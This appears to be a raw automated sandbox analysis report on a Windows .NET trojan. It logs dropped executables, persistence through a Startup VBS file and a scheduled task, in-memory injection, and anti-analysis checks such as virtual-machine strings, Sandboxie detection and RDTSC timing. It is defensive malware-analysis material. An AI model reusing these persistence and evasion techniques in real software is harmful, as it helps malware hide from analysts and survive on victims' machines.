Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, TaskPrincipal.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, TaskSecurity.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, TaskSecurity.cs | Security API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, TaskFolder.cs | Security API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, User.cs | Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, Task.cs | Security API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
Source: classification engine | Classification label: mal100.troj.expl.evad.winEXE@14/6@1/2
Source: C:\Users\user\Desktop\uC4EETMDcz.exe | Code function: 3_2_0040166B CreateToolhelp32Snapshot
Source: C:\Users\user\Desktop\uC4EETMDcz.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs
Source: C:\ProgramData\faer\wopbv.exe | Mutant created: NULL
Source: C:\ProgramData\faer\wopbv.exe | Mutant created: \Sessions\1\BaseNamedObjects\Test Task17
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs"
Source: uC4EETMDcz.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\uC4EETMDcz.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: uC4EETMDcz.exe | ReversingLabs: Detection: 57%
Source: C:\Users\user\Desktop\uC4EETMDcz.exe | File read: C:\Users\user\Desktop\uC4EETMDcz.exe
Source: unknown | Process created: C:\Users\user\Desktop\uC4EETMDcz.exe "C:\Users\user\Desktop\uC4EETMDcz.exe"
Source: C:\Users\user\Desktop\uC4EETMDcz.exe | Process created: C:\Users\user\Desktop\uC4EETMDcz.exe "C:\Users\user\Desktop\uC4EETMDcz.exe"
Source: unknown | Process created: C:\ProgramData\faer\wopbv.exe C:\ProgramData\faer\wopbv.exe
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\brokerutil.exe "C:\Users\user\AppData\Local\brokerutil.exe"
Source: C:\ProgramData\faer\wopbv.exe | Process created: C:\ProgramData\faer\wopbv.exe "C:\ProgramData\faer\wopbv.exe"
Source: C:\Users\user\AppData\Local\brokerutil.exe | Process created: C:\Users\user\AppData\Local\brokerutil.exe "C:\Users\user\AppData\Local\brokerutil.exe"
Source: unknown | Process created: C:\ProgramData\faer\wopbv.exe C:\ProgramData\faer\wopbv.exe
Source: C:\ProgramData\faer\wopbv.exe | Process created: C:\ProgramData\faer\wopbv.exe "C:\ProgramData\faer\wopbv.exe"
Source: C:\Users\user\Desktop\uC4EETMDcz.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, ntmarta.dll, uxtheme.dll, mstask.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, wintypes.dll, sspicli.dll, mpr.dll
Source: C:\ProgramData\faer\wopbv.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll
Source: C:\Users\user\AppData\Local\brokerutil.exe | Section loaded: mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: version.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: textinputframework.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: coreuicomponents.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: uC4EETMDcz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: uC4EETMDcz.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2398413540.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3066703726.00000000059A0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2398413540.00000000055C0000.00000004.08000000.00040000.00000000.sdmp, wopbv.exe, 00000004.00000002.2630250940.00000000039BC000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3066703726.00000000059A0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2392969928.0000000003B54000.00000004.00000800.00020000.00000000.sdmp, uC4EETMDcz.exe, 00000001.00000002.2399072172.0000000005680000.00000004.08000000.00040000.00000000.sdmp

                      Data Obfuscation

                      Source: uC4EETMDcz.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: brokerutil.exe.1.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.uC4EETMDcz.exe.55c0000.10.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: 1.2.uC4EETMDcz.exe.5680000.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 1.2.uC4EETMDcz.exe.5680000.11.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 1.2.uC4EETMDcz.exe.5680000.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 1.2.uC4EETMDcz.exe.5680000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 1.2.uC4EETMDcz.exe.5680000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 1.2.uC4EETMDcz.exe.3c80c50.4.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: Yara matchFile source: 7.2.brokerutil.exe.3d87f90.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.uC4EETMDcz.exe.5500000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2396891242.0000000005500000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2744031290.0000000003D31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2378662559.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: uC4EETMDcz.exe PID: 3660, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wopbv.exe PID: 368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: brokerutil.exe PID: 3196, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: wopbv.exe PID: 1456, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_00F8FA70 push 68028BD5h; retf 1_2_00F8FA7D
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F9CBC8 push esp; retf 1_2_04F9CDAD
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_04F9DE5E push ds; ret 1_2_04F9DE5F
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_0557051E push ds; ret 1_2_0557051F
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_0557327C push edi; iretd 1_2_05573282
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_05573680 push edx; retf 1_2_05573687
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 1_2_056EC3E1 push 68055635h; retf 1_2_056EC3ED
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_0040526A push ds; ret 3_2_0040526B
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_0040556A push ds; ret 3_2_0040556B
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_004057D7 pushad ; retf 3_2_004057EA
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeCode function: 3_2_00405E99 push ds; ret 3_2_00405E9A
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF04CF push ebx; retf 0000h4_2_00CF04DA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF049F push ebx; retf 0000h4_2_00CF04CA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55CF push ecx; iretd 4_2_00CF55D2
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55CD push ecx; iretd 4_2_00CF55CE
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55C4 push ecx; iretd 4_2_00CF55CA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55DB push edx; iretd 4_2_00CF55DE
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55D9 push edx; iretd 4_2_00CF55DA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55D5 push edx; iretd 4_2_00CF55D6
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55ED push esp; iretd 4_2_00CF55EE
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55E7 push ebx; iretd 4_2_00CF55EA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55E1 push ebx; iretd 4_2_00CF55E2
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55FC push ebp; iretd 4_2_00CF55FE
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55F8 push ebp; iretd 4_2_00CF55FA
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF55F3 push esp; iretd 4_2_00CF55F6
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CF09A9 push ebx; retf 5500h4_2_00CF09B6
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_00CFFA70 push 680501D5h; retf 4_2_00CFFA7D
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_05051913 push eax; ret 4_2_0505191D
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0507CBC8 push esp; retf 4_2_0507CDAD
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_0507DE5E push ds; ret 4_2_0507DE5F
                      Source: C:\ProgramData\faer\wopbv.exeCode function: 4_2_052B051E push ds; ret 4_2_052B051F
                      Source: uC4EETMDcz.exeStatic PE information: section name: .text entropy: 7.965586296497431
                      Source: brokerutil.exe.1.drStatic PE information: section name: .text entropy: 7.965586296497431
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Users\user\AppData\Local\brokerutil.exeJump to dropped file
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\ProgramData\faer\wopbv.exeJump to dropped file

                      Boot Survival

                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbsJump to dropped file
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brokerutil.vbsJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeFile created: C:\Windows\Tasks\Test Task17.jobJump to behavior
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\brokerutil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\faer\wopbv.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara match File source: Process Memory Space: uC4EETMDcz.exe PID: 3660, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: wopbv.exe PID: 368, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: brokerutil.exe PID: 3196, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: wopbv.exe PID: 1456, type: MEMORYSTR
                      Source: uC4EETMDcz.exe, 00000001.00000002.2378662559.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 00000004.00000002.2619060689.000000000286A000.00000004.00000800.00020000.00000000.sdmp, brokerutil.exe, 00000007.00000002.2726825474.0000000002D31000.00000004.00000800.00020000.00000000.sdmp, wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe RDTSC instruction interceptor: First address: 402E5A second address: 402E5A instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push ecx 0x00000007 push edx 0x00000008 push edi 0x00000009 push esi 0x0000000a imul eax, eax, 001E7319h 0x00000010 add eax, 3CFB5543h 0x00000015 rcr eax, 10h 0x00000018 add eax, esi 0x0000001a imul eax, edi 0x0000001d xor edx, edx 0x0000001f mul dword ptr [ebp+08h] 0x00000022 mov eax, edx 0x00000024 pop esi 0x00000025 pop edi 0x00000026 pop edx 0x00000027 pop ecx 0x00000028 pop ebx 0x00000029 leave 0x0000002a retn 0004h 0x0000002d lea eax, dword ptr [eax+00000300h] 0x00000033 push eax 0x00000034 push 00405C2Fh 0x00000039 call 00007F33C4532B3Ch 0x0000003e push ebp 0x0000003f mov ebp, esp 0x00000041 push ebx 0x00000042 push edi 0x00000043 push esi 0x00000044 mov edi, dword ptr [ebp+08h] 0x00000047 push 000000FFh 0x0000004c call 00007F33C45312F9h 0x00000051 rdtsc
                      Source: C:\ProgramData\faer\wopbv.exe RDTSC instruction interceptor: First address: 402E5A second address: 402E5A instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push ecx 0x00000007 push edx 0x00000008 push edi 0x00000009 push esi 0x0000000a imul eax, eax, 001E7319h 0x00000010 add eax, 3CFB5543h 0x00000015 rcr eax, 10h 0x00000018 add eax, esi 0x0000001a imul eax, edi 0x0000001d xor edx, edx 0x0000001f mul dword ptr [ebp+08h] 0x00000022 mov eax, edx 0x00000024 pop esi 0x00000025 pop edi 0x00000026 pop edx 0x00000027 pop ecx 0x00000028 pop ebx 0x00000029 leave 0x0000002a retn 0004h 0x0000002d lea eax, dword ptr [eax+00000300h] 0x00000033 push eax 0x00000034 push 00405C2Fh 0x00000039 call 00007F33C4F7C41Ch 0x0000003e push ebp 0x0000003f mov ebp, esp 0x00000041 push ebx 0x00000042 push edi 0x00000043 push esi 0x00000044 mov edi, dword ptr [ebp+08h] 0x00000047 push 000000FFh 0x0000004c call 00007F33C4F7ABD9h 0x00000051 rdtsc
                      Source: C:\ProgramData\faer\wopbv.exe RDTSC instruction interceptor: First address: 402E5A second address: 402E5A instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push ecx 0x00000007 push edx 0x00000008 push edi 0x00000009 push esi 0x0000000a imul eax, eax, 001E7319h 0x00000010 add eax, 3CFB5543h 0x00000015 rcr eax, 10h 0x00000018 add eax, esi 0x0000001a imul eax, edi 0x0000001d xor edx, edx 0x0000001f mul dword ptr [ebp+08h] 0x00000022 mov eax, edx 0x00000024 pop esi 0x00000025 pop edi 0x00000026 pop edx 0x00000027 pop ecx 0x00000028 pop ebx 0x00000029 leave 0x0000002a retn 0004h 0x0000002d lea eax, dword ptr [eax+00000300h] 0x00000033 push eax 0x00000034 push 00405C2Fh 0x00000039 call 00007F33C4532B3Ch 0x0000003e push ebp 0x0000003f mov ebp, esp 0x00000041 push ebx 0x00000042 push edi 0x00000043 push esi 0x00000044 mov edi, dword ptr [ebp+08h] 0x00000047 push 000000FFh 0x0000004c call 00007F33C45312F9h 0x00000051 rdtsc
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Memory allocated: F80000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Memory allocated: 2AF0000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Memory allocated: 2910000 memory reserve | memory write watch
                      Source: C:\ProgramData\faer\wopbv.exe Memory allocated: CF0000 memory reserve | memory write watch
                      Source: C:\ProgramData\faer\wopbv.exe Memory allocated: 2800000 memory reserve | memory write watch
                      Source: C:\ProgramData\faer\wopbv.exe Memory allocated: D60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\brokerutil.exe Memory allocated: EA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\brokerutil.exe Memory allocated: 2D30000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\brokerutil.exe Memory allocated: 29E0000 memory reserve | memory write watch
                      Source: C:\ProgramData\faer\wopbv.exe Memory allocated: 1590000 memory reserve | memory write watch
                      Source: C:\ProgramData\faer\wopbv.exe Memory allocated: 3140000 memory reserve | memory write watch
                      Source: C:\ProgramData\faer\wopbv.exe Memory allocated: 2F40000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Code function: 3_2_00402E5A rdtsc 3_2_00402E5A
                      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe TID: 5636 Thread sleep time: -60000s >= -30000s
                      Source: C:\ProgramData\faer\wopbv.exe TID: 2572 Thread sleep time: -60000s >= -30000s
                      Source: C:\ProgramData\faer\wopbv.exe TID: 2104 Thread sleep time: -60000s >= -30000s
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Thread delayed: delay time: 60000
                      Source: C:\ProgramData\faer\wopbv.exe Thread delayed: delay time: 60000
                      Source: C:\ProgramData\faer\wopbv.exe Thread delayed: delay time: 60000
                      Source: wopbv.exe, 00000008.00000002.3390352551.000000000125B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
                      Source: wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                      Source: wopbv.exe, 00000008.00000002.3390352551.00000000012C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: wopbv.exe, 0000000B.00000002.3039485950.0000000003141000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                      Source: wopbv.exe, 00000008.00000002.3390352551.00000000012C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW_
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Code function: 3_2_00402E5A rdtsc 3_2_00402E5A
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Code function: 3_2_00402E87 LdrLoadDll,3_2_00402E87
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Code function: 3_2_00402E87 mov eax, dword ptr fs:[00000030h] 3_2_00402E87
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Code function: 3_2_00401000 EntryPoint,CreateThread,SetUnhandledExceptionFilter,GetModuleFileNameW,EnumWindows,GetEnvironmentVariableW,CreateDirectoryW,CopyFileW,CopyFileW,Sleep,CreateMutexW,ExitProcess,3_2_00401000
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Memory written: C:\Users\user\Desktop\uC4EETMDcz.exe base: 400000 value starts with: 4D5A
                      Source: C:\ProgramData\faer\wopbv.exe Memory written: C:\ProgramData\faer\wopbv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\brokerutil.exe Memory written: C:\Users\user\AppData\Local\brokerutil.exe base: 570000 value starts with: 4D5A
                      Source: C:\ProgramData\faer\wopbv.exe Memory written: C:\ProgramData\faer\wopbv.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\uC4EETMDcz.exe Process created: C:\Users\user\Desktop\uC4EETMDcz.exe "C:\Users\user\Desktop\uC4EETMDcz.exe"
